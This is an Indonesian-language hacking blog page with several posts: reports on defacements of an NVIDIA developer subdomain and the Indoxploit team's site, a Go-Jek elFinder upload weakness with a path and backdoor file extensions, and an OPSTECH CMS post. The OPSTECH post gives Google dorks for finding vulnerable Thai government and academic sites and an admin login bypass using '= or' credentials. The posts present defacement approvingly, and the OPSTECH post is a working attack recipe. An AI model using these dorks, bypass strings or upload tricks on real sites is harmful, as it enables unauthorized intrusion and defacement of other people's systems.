Showing posts with label website. Show all posts
Showing posts with label website. Show all posts

Friday, February 24, 2017

Website NVIDIA Got Hacked

Website NVIDIA Got Hacked


Website NVIDIA Got Hacked

Website NVIDIA Got Hacked - Pada tau  NVIDIA kan ? NVIDIA  adalah sebuah perusahaan yang mengembangkan sebuah Graphics Card untuk komputer. NVIDIA banyak di gemari oleh para gammer di seluruh dunia. apalagi nvidia gtax 1080.

Nah pada hari ini 12/24/16 website NVIDIA di hack oleh salah satu hacker yang mempunyai nick Xaveroz_Tersakiti.

Xaveroz_Tersakiti meretas subdomain developer dari nvidia yang beralamat di developer.nvidia.com
Walaupun yang di retas bukan index halaman homepagenya. tetapi hal ini tidak bisa dianggap remeh oleh pengembang website nvidia. Dari celah yang kecil ini mungkin saja bisa merembet ke beberapa directory.

Entah mengapa sang hacker tidak meretas Halam depan atau homepagenya. " Mungkin Saja " akses directory di halaman depannya tidak writable. atau tidak bisa di akses atau tidak bisa di eksekusi.

Letak direktory yang dimasuki oleh Xaveroz_Tersakiti yaitu terletak di  :

developer.nvidia.com/sites/default/files/webform/xaveroz.html

Di dalam script tersebut sang hacker meninggalkan sebuah pesan berikut ini :

PAWNED BY:

[#]Xaveroz_Tersakiti[#]


Message for Admin :

Sorry Admin !

Your Site Has Been Hacked System Security Is Low , Please Patch Your System. 
This Is Just A Warning If You Still Dont want to patch it

We Will Keep On Hacking it. 

Kemudian di bagian footer terdapat nickname hacker lainnya :
__________________________ __________________________

GrenXPaRTa - r00tkit404 - Jilan404 - Arthiz Cyber - Indonesia Defacer Tersakiti - DiffMuRis - ML7C - MalaysiaGov - Abrasax1337 - ./MR.ROB0T - fcod3x - Jiwa Tersesat - 0x1958 - Gboys_Flush CyberGhost.17 - Mr.Vendeta_404 - ZakirDotID - ins7ing - Mr.spongebob - Krypton - l0c4lh0st

Ketika kita mengunjungi developer.nvidia.com/sites/default/files/webform/
Disana terdapat sebuah tulisan seperti ini :  
 __ .__
___________ _____/ |_| |__ ____ ____ ____
____ __ / __ | _/ __ / _ /
| |_> > __ | | | | Y ___( <_> ) |
| __(____ /___| /__| |___| /___ >____/|___| /
|__| / / / / /


No site detected. Make sure your code is pulled into this environment.

Mungkin saja ini adalah penjaga security dari website nvidia tersebut :D 

POC :

Dari keterangan yang didapat, sang hacker dapat masuk kedalam sistem website tersebut dengan metode Hidden Uploader

Mirror :
Dalam kasus peretasan ini kita tidak menemukan mirror nya di zone h dalam archive ataupun onhold.
Mungkin saja di mirrorkan dalam web mirrror lainnya

3xploi7 Team 

Available link for download

Read more »

Sunday, February 19, 2017

OPSTECH CMS Bypass Admin Login Thailand Gov Ac Website Vulnerable !

OPSTECH CMS Bypass Admin Login Thailand Gov Ac Website Vulnerable !



#- Title: OPSTECH CMS Bypass Admin Login
#- Author: unknown
#- Team : -
#- Published : -
#- Developer : Opestech
#- Link : Opestech.co.th
#- Price : -
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 

Opestech merupakan developer website thailand yang melayani pembuatan website. Kebanyakan opestech melayani pembuatan website gov, ac dan website lainnya.

Vulnerability : 
site /index.php?mod=login&path=user&/index.php?mod=login&path=login

Dork :
intext:Copyright © 2008 by OPSTECH  
inurl:/index.php?mod=login&path=user 
inurl:/index.php?mod=login&path=login

Method
1. Dorking & find your target
2. Target.com/exploit Ex : target .com/index.php?mod=login&path=user & /index.php?mod=login&path=login
3. Login as admin
Admin: = or | Password : = or
4. Done

Available link for download

Read more »

Monday, February 6, 2017

Website Indoxploit di Hack !!

Website Indoxploit di Hack !!



 Website Indoxploit di Hack !! - Indoxploit adalah sebuah Team Defacer Indonesia yang hebat dalam hal kodingannya yang membuat macam macam tools exploiter. Apakah kamu masih ingat dengan UnknownYmouz ? Yap, dia yang berhasil meretas situs toyota.

Baca Selengkapnya : Situs Toyota Kembali Di Hack !

Lagi lagi UnknownYmouz membuat geger dunia bawah tanah sebab, Pada tanggal 2016-06-28 website team defacer Indoxploit kena tested oleh UnknownYmouz . Tidak ada motif khusus dari serangan ini. UnknownYmouz  hanya Tested saja, terlihat dari pesan yang disampaikannya yaitu : Just test min :u tidak bermaksud saling menjatuhkan :u

Website Indoxploit yang Homepagenya berupa portal halaman berubah seketika menjadi gelap. Dengan background berwarna hitam dengan Terdapat tulisan " Indonesian Code Party " kemudian di bagian tengahnya terdapat Foto kartu remi dan tidak lupa Terdapat Tulisan : " Hacked by UnknownYmouz " yang disertai dengan nama anggota dari team Indonesian Code Party.

Hacked by UnknownYmouz
# Indonesian Code Party #
$ ZeynnymouZ | ./BlaDDzeRR | UnknownYmouz | -DenJaka- | Consept_IXI | ./Coco | 0x1999 | Lock-Down | ./UnIX | ./L1ght_R00t | Walkers404 
Greetz : FadliDotID_007 - ./KidSZonk - Kefiex404 - Malaikat_Galau - IndoXploit - Extreme Crew
Just test min :u tidak bermaksud saling menjatuhkan :u

CONTACT ME ( Menuju ke link fanpage Indonesian Code Party )


Ternyata UnknownYmouz juga meninggalkan pesan tersembunya yaitu : 

" To Admin : Kindly Patch Your System Immediately !!! Salam, UnknownYmouz "


Pesan tersembunyi menggunakan javascript dan pesan tersebut dapat dilihat jika kamu menekan tombol CTRL 

POC 
Dari informasi yang kami dapat, UnknownYmouz dapat masuk ke website indoxploit karena terdapat sebuah uploader yang tidak aman & dapat menjadi " sarang lebah ".
Uploader tersebut terdapat didalam dir Autoexploiter milik team mereka. Itu merupakan sebuah insiden yang fatal menurut kami.

Informasi Tambahan 
Ternyata tidak hanya website Indoxploit saja yang kena tested, Forum Indoxploit pun juga kena tested pada tanggal 2016-05-24. Forum Indoxploit kena tested oleh Shu1337. Yang sepertinya Shu1337 berasal dari team Indonesian Cyber Army / JKT 48 Cyber Team.

Terpampang disana nama nama dari team mereka : 
onixaqua - erzajullian - i3r_cod3 - skeptix - bekasi0d0nk - vergos303 - barrabravaz - yuneroz

Mirror
indoxploit.or.id hacked. Notified by UnknownYmouz
Notified by: UnknownYmouz   
IP address: 94.100.31.218 ( Netherlands )
Domain: indoxploit.or.id 
System: LinuxWeb 
Server: LiteSpeed


Zone h :
http://www.zone-h.org/mirror/id/26460338
===

forum.indoxploit.or.id hacked. Notified by Shu1337

Notified by: Shu1337
Domain: forum.indoxploit.or.id
IP address: 162.210.198.23  ( United States )

System: LinuxWeb 
server: Apache

Zone h : 
http://www.zone-h.org/mirror/id/26307138


Available link for download

Read more »

Friday, February 3, 2017

Bug Pada Website GO JEK Indonesia

Bug Pada Website GO JEK Indonesia



Bug Pada Website GO-JEK Indonesia - Go-Jek merupakan sebuah startup yang menggunakan teknologi sebagai modal utama untuk menjalankan bisnisnya. Kami rasa Go-jek sendiri pasti mempunyai banyak sekali team didalamnya, seperti team developer, design, marketing dan lain lain. dan kami yakin pastinya gojek juga mempunyai team security untuk menjaga keamanan teknologi yang dipakainya.

Memang Go-jek tidak sepenuhnya menggunakan websitenya untuk menjalankan kegiatanya. Gojek hanya menggunakan aplikasi pada android / ios / os lainnya. Tetapi tidak menutup kemungkinan apakah website gojek dibiarkan begitu saja ? Menurut kami website juga sangat penting walaupun tidak banyak digunakan tetapi paling tidak dijaga keamanannya untuk mengindari sesuatu yang fatal. 

Ternyata website gojek mempunyai bug lohh.. 
mau tau ? Simak berikut ini 

Bug Website GoJek

#- Title: Bug Website GoJek 
#- Author: Tidak dipastikan
#- Published : 7-17-2016
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows
========================================================================
Proof Of Concept 


Vulnerability :
site.com/path/elfinder

Vuln Extension :
.php .php3 .php6 .txt .html .pl .htaccess .html .phtml .jpg .gif and anymore

Jenis Kerusakan : 
Lumayan Tinggi ( Tergantung Webnya )

Metode Penyerangan :
Attacker dapat menyerang celah ini dengan mengupload backdoor dengan berbagai extension

Deskripsi :

Go-jek mempunyai bug kemanan pada websitenya. bug tersebut adalah bug yang sudah banyak digunakan oleh beberapa website didunia. Jadi kami tidak kaget lagi tentang bug itu. Bug itu adalah : elFinder 2.0 - file manager for web(rc1) - File Upload Vulnerability
Bug ini sudah lama ditemukan sekitar 2 tahun yang lalu. 




Nampaknya go-jek sudah mengantisipasi hal berikut. Elfinder yang terdapat gojek ini sudah ditata sedimikian rupa sehingga para attacker hanya bisa mengupload beberapa file tetapi tidak bisa dapat mengeksekusi. 

Tetapi tidak menutup kemungkinan mungkin ada attacker yang lebih lihai lagi. Bisa saja elfindernya dibypass kemudian attacker tersebut dapat masuk kedalam public html. Tentu hal ini bisa berakibat fatal bagi Go-jek

Reference :  0day .today/exploit/22381

Solve
Patching




 ( Pic )




Available link for download

Read more »